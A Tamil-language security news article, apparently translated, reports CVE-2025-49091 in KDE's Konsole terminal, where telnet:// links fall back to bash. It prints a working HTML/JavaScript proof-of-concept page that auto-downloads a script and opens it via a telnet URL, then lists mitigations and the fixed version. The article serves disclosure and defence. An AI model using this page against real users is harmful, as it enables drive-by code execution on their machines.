கான்சோலில் உள்ள கடுமையான பாதிப்பு, ஒரு வலைப்பக்கத்தைத் திறப்பதன் மூலம் குறியீட்டை செயல்படுத்த அனுமதிக்கிறது.

பாதிப்பு

சில நாட்களுக்கு முன்பு ஒரு தகவல் வெளியிடப்பட்டது சிக்கலான பாதிப்பு, இது "" இன் கீழ் அடையாளம் காணப்பட்டது.CVE-2025-49091«. இந்த பாதிப்பு கான்சோலில் கண்டுபிடிக்கப்பட்டது ((KDE முனைய முன்மாதிரி), ஒரு உலாவியிலிருந்து ஒரு தீங்கிழைக்கும் வலைப்பக்கத்தைப் பார்வையிடுவதன் மூலம் தொலை குறியீட்டை செயல்படுத்த அனுமதிக்கிறது.

இந்தப் பிரச்சனை என்று குறிப்பிடப்பட்டுள்ளது KTelnetService மற்றும் Konsole இன் பாதிக்கப்படக்கூடிய பதிப்பு உள்ள அமைப்புகளைப் பாதிக்கிறது நிறுவப்பட்டிருக்கின்றன, ஆனால் டெல்நெட், rlogin அல்லது ssh நிரல்களில் குறைந்தபட்சம் ஒன்று நிறுவப்படவில்லை. பாதிப்பு KDE டெர்மினல் எமுலேட்டர் கன்சோலில் அமைந்துள்ளது. KDE ஆலோசனையில் குறிப்பிட்டுள்ளபடி, 25.04.2 க்கு முந்தைய கான்சோல் பதிப்புகள் பாதிக்கப்படக்கூடியவை.

கான்சோல் ஸ்கீமா கட்டுப்படுத்திகளிலிருந்து URL களை ஏற்றுவதை ஆதரிக்கிறது,
டெல்நெட்://URL. டெல்நெட்டா இல்லையா என்பதைப் பொருட்படுத்தாமல் இதை இயக்கலாம்.
பைனரி கிடைக்கிறது.

இந்தப் பயன்முறையில், டெல்நெட் கிடைக்கவில்லை என்றால், கான்சோலுக்கு ஒரு வழி இருந்தது,
வழங்கப்பட்ட வாதங்களுக்கு மீண்டும் bash ஐப் பயன்படுத்தும்; இது
வழங்கப்பட்ட URL ஆகும். இது தாக்குபவர் தன்னிச்சையான குறியீட்டை இயக்க அனுமதிக்கிறது.
குறியீடு.

பயனர் வெளிப்புற உலாவியைத் திறக்கும்போது உலாவிகள் பொதுவாக ஒரு செய்தியைக் காண்பிக்கும்.
சந்தேகத்திற்குரியதாகத் தோன்றக்கூடிய மற்றும் பயனர் தொடர்பு தேவைப்படும் ஸ்கீமா கட்டுப்படுத்தி
சுரண்டப்படக்கூடியதாக இருக்கும்.

பிரச்சனைக்கான காரணம்: KTelnetService மற்றும் ஆபத்தான URL திட்டங்கள்.

இந்த பாதிப்புக்குப் பின்னால் உள்ள சிக்கல் KDE இல் இயல்பாக சேர்க்கப்பட்டுள்ள KTelnetService சேவையின் நடத்தையில் உள்ளது என்று ஆராய்ச்சியாளர்கள் குறிப்பிடுகின்றனர். இந்த சேவை telnet://, rlogin://, மற்றும் ssh:// URL திட்டங்களை செயலாக்குவதற்கு பொறுப்பாகும், மேலும் தொடர்புடைய பயன்பாடுகளை (telnet, rlogin, அல்லது ssh) பயன்படுத்தி Konsole இல் நேரடியாக இந்த இணைப்புகளைத் திறக்க வடிவமைக்கப்பட்டுள்ளது.

இருப்பினும், இந்த பயன்பாடுகள் கணினியில் நிறுவப்படாதபோது இந்த குறைபாடு ஏற்படுகிறது. அந்த நிலையில், இணைப்பில் குறிப்பிடப்பட்டுள்ள கட்டளையை இயக்க முயற்சிக்கும்போது, ​​கான்சோல் /bin/bash ஐ மாற்றாகப் பயன்படுத்துகிறது. எனவே, ஒரு தாக்குபவர் தனிப்பயன் இணைப்பை உருவாக்க முடியும்.

முதல் பார்வையில் இது முக்கியமற்றதாகத் தோன்றினாலும், சிக்கல் மேலும் சிக்கலானது, ஏனெனில் தாக்குபவர் தனிப்பயன் கட்டளையைப் பயன்படுத்தி பயனரின் பதிவிறக்கக் கோப்பகத்தில் உள்ள எந்தக் கோப்பையும் இயக்க முடியும். வேறு வார்த்தைகளில் கூறுவதானால், அந்தத் திட்டத்துடன் உள்ள இணைப்பை பயனர் கிளிக் செய்தால் எந்தக் கோப்பும் தானாகவே செயல்படுத்தப்படும்.

இது ஏன் இவ்வளவு ஆபத்தானது?

Firefox மற்றும் Chrome போன்ற நவீன உலாவிகள் (அவற்றின் இயல்புநிலை அமைப்புகளில்) பதிவிறக்கம் செய்யப்பட்ட கோப்புகளை பயனர் உறுதிப்படுத்தல் தேவையில்லாமல் தானாகவே ~/Downloads கோப்புறையில் சேமிக்கின்றன. பதிவிறக்கம் முடிந்த பிறகு மட்டுமே அவை அறிவிப்பைக் காண்பிக்கும்.

இந்த நடத்தை, லினக்ஸ் கணினிகளில் உலாவியின் தற்போதைய கோப்பக பாதையை அணுக முடியும் என்ற உண்மையுடன் இணைந்து, பயனருக்குத் தெரியாமல் தானாகவே பதிவிறக்கம் செய்யப்பட்ட தீங்கிழைக்கும் கோப்பை பின்னர் கான்சோலில் இருந்து இயக்க அனுமதிக்கிறது.

கருத்துச் சான்று (PoC): பாதிப்பு எவ்வாறு சுரண்டப்படுகிறது

குறைபாட்டின் ஆபத்தை நிரூபிக்க, ஆராய்ச்சியாளர்கள் பின்வரும் ஜாவாஸ்கிரிப்ட் குறியீடு துணுக்கை உருவாக்கினர், இது ஒரு தாக்குபவர் ஒரு வலைப்பக்கத்திலிருந்து இந்த பாதிப்பை எவ்வாறு பயன்படுத்திக் கொள்ள முடியும் என்பதை நிரூபிக்கிறது:

<html>
<head>
<script type="text/javascript">

function downloadAndRedirect() {
const anchor = document.createElement('a');
anchor.href = "data:;base64,ZWNobyAiSGVsbG8gd29ybGQiCnRvdWNoIC90bXAvZm9vYmFyCg==";
anchor.download = 'evil';
document.body.appendChild(anchor);
anchor.click();
document.body.removeChild(anchor);

setTimeout(() => {
window.location.href = "telnet:///proc/self/cwd/Downloads/evil";
}, 1000);
}
</script>
</head>
<body onload="downloadAndRedirect()">
</body>
</html>

Firefox மற்றும் Chrome இல், பயனர் telnet:// இணைப்பை ஏற்றுக்கொண்டால், பின்வருபவை செயல்படுத்தப்படும்:

/usr/bin/konsole --noclose -e telnet /proc/self/cwd/Descargas/evil

மேலும், டெல்நெட் இல்லையென்றால், தீங்கிழைக்கும் ஸ்கிரிப்ட் பாஷுடன் செயல்படுத்தப்படும்.

தற்காலிக தணிப்பு நடவடிக்கைகள்

இணைப்புக்காகக் காத்திருக்கும்போது அல்லது உடனடியாகப் புதுப்பிக்க முடியாவிட்டால், சிக்கலைத் தணிக்க இரண்டு எளிய வழிகள் உள்ளன:

டெல்நெட், rlogin மற்றும் ssh பயன்பாடுகளை நிறுவவும்.

இந்தப் பயன்பாடுகள் இருந்தால், கான்சோல் அவற்றைச் சரியாக இயக்கும், மேலும் பாஷை நாடாது. இது தன்னிச்சையான உள்ளடக்கம் ஒரு ஸ்கிரிப்டாக செயல்படுத்தப்படுவதைத் தடுக்கிறது.

sudo apt install telnet rlogin openssh-client

KTelnetService சேவை கோப்பை நீக்கவும்.

இந்தத் திட்டங்களைப் பதிவு செய்வதற்குப் பொறுப்பான கோப்பை நீங்கள் நீக்கலாம்:

sudo rm /usr/share/applications/ktelnetservice6.desktop

இது telnet://, rlogin://, அல்லது ssh:// இணைப்புகளை Konsole தானாகவே கையாளுவதைத் தடுக்கும்.

தீர்வு: Konsole 25.04.2 க்கு அவசர புதுப்பிப்பு.

KDE Gear 25.04.2 புதுப்பிப்பில் சேர்க்கப்பட்டுள்ள Konsole பதிப்பு 25.04.2 இல் பாதிப்பு சரி செய்யப்பட்டுள்ளது. அனைத்து பயனர்களும் கணினி நிர்வாகிகளும் உடனடியாக புதுப்பிக்குமாறு கடுமையாக அறிவுறுத்தப்படுகிறார்கள்.

இறுதியாக, நீங்கள் அதைப் பற்றி மேலும் தெரிந்து கொள்ள ஆர்வமாக இருந்தால், நீங்கள் விவரங்களைப் பார்க்கலாம் பின்வரும் இணைப்பு.


உங்கள் கருத்தை தெரிவிக்கவும்

உங்கள் மின்னஞ்சல் முகவரி வெளியிடப்பட்ட முடியாது. தேவையான புலங்கள் குறிக்கப்பட்டிருக்கும் *

*

*

  1. தரவுக்கு பொறுப்பு: மிகுவல் ஏஞ்சல் கேடன்
  2. தரவின் நோக்கம்: கட்டுப்பாட்டு ஸ்பேம், கருத்து மேலாண்மை.
  3. சட்டபூர்வமாக்கல்: உங்கள் ஒப்புதல்
  4. தரவின் தொடர்பு: சட்டபூர்வமான கடமையால் தவிர மூன்றாம் தரப்பினருக்கு தரவு தெரிவிக்கப்படாது.
  5. தரவு சேமிப்பு: ஆக்சென்டஸ் நெட்வொர்க்குகள் (EU) வழங்கிய தரவுத்தளம்
  6. உரிமைகள்: எந்த நேரத்திலும் உங்கள் தகவல்களை நீங்கள் கட்டுப்படுத்தலாம், மீட்டெடுக்கலாம் மற்றும் நீக்கலாம்.